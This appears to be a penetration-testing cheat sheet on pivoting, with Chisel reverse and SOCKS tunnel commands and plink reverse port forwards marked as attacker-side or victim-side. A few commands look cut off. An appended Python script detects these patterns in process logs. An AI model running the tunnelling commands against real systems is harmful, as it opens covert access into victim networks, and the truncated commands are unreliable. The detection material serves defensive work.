Pivoting Techniques





You can download Chisel from the releases page of https://github.com/jpillora/chisel. You need to use the same version for client and server.


./chisel server -p 8080 --reverse #Server — Attacker

./chisel-x64.exe client R:socks #Client — Victim

#And now you can use proxychains with port 1080 (default)

./chisel server -v -p 8080 --socks5 #Server — Victim (needs to have port 8080 exposed)

./chisel client -v socks #Attacker

Port forwarding

./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server — Attacker

./chisel_1.7.6_linux_amd64 client R:4505: #Client — Victim


Plink is like a console version of PuTTY (the options are very similar to those of an ssh client).

As this binary will be executed on the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a port that is only locally accessible to a port on our machine:

echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-P <port>] -R <port_in_our_host>:<next_ip>:<final_port> <your_ip>

echo y | plink.exe -l root -pw password [-P 2222] -R 9090: #Local port 9090 to our port 9090
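
A detection-side view of the command lines above, as an added example that is not part of the original page: a small Python triage function that flags the argument patterns shown here (reverse remotes, `--reverse`/`--socks5` servers, plink `-R` with `-pw`) in process-creation logs. The indicator labels, the `svc-helper` binary name, the sample command lines and their addresses are constructed for illustration.

```python
import re

# Reverse "remote" specs in the forms this page uses: R:socks, R:<port>:...
REMOTE_SPEC = re.compile(r"^R:(socks$|\d+:|[\w.\-]+:\d+:)", re.I)
PLINK_NAME = re.compile(r"(^|[\\/])plink(\.exe)?$", re.I)


def classify(cmdline):
    """Return tunnelling indicators found in one process command line."""
    argv = [tok.strip("\"'") for tok in cmdline.split()]
    hits = []
    # Chisel is matched on argument shape, not file name: the page alone uses
    # three binary names (chisel, chisel-x64.exe, chisel_1.7.6_linux_amd64).
    if "server" in argv:
        hits += [f"server{f}" for f in ("--reverse", "--socks5") if f in argv]
    if "client" in argv:
        after = argv[argv.index("client") + 1:]
        if any(REMOTE_SPEC.match(tok) for tok in after):
            hits.append("client-reverse-remote")
        elif "socks" in after:
            hits.append("client-socks")
    for i, tok in enumerate(argv):
        if PLINK_NAME.search(tok):
            after = argv[i + 1:]
            if "-R" in after:
                hits.append("plink-remote-forward")
            if "-pw" in after:
                hits.append("plink-password-on-cmdline")
    return hits


# Constructed process-creation command lines (RFC 5737 documentation addresses).
SAMPLES = [
    r"C:\Users\Public\chisel-x64.exe client 192.0.2.10:8080 R:socks",
    "./chisel_1.7.6_linux_amd64 client 192.0.2.10:12312 R:4505:127.0.0.1:4505",
    "./svc-helper server -v -p 8080 --socks5",
    r'cmd.exe /c "echo y | plink.exe -l user -pw secret -R 9090:127.0.0.1:9090 192.0.2.10"',
    "git clone https://example.com/client/server.git",
    "/usr/bin/ssh -N -L 8080:127.0.0.1:80 jump.example.com",
]


def scan(lines):  # flagged lines only; clean lines are omitted
    return {line: hits for line in lines if (hits := classify(line))}


if __name__ == "__main__":
    for line, hits in scan(SAMPLES).items():
        print(", ".join(hits), "<-", line)
```

Matching on argument shape catches a renamed binary (the `svc-helper` sample) but will also flag unrelated tools that happen to share the `server`/`client` grammar, so treat hits as triage leads and correlate them with network telemetry.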
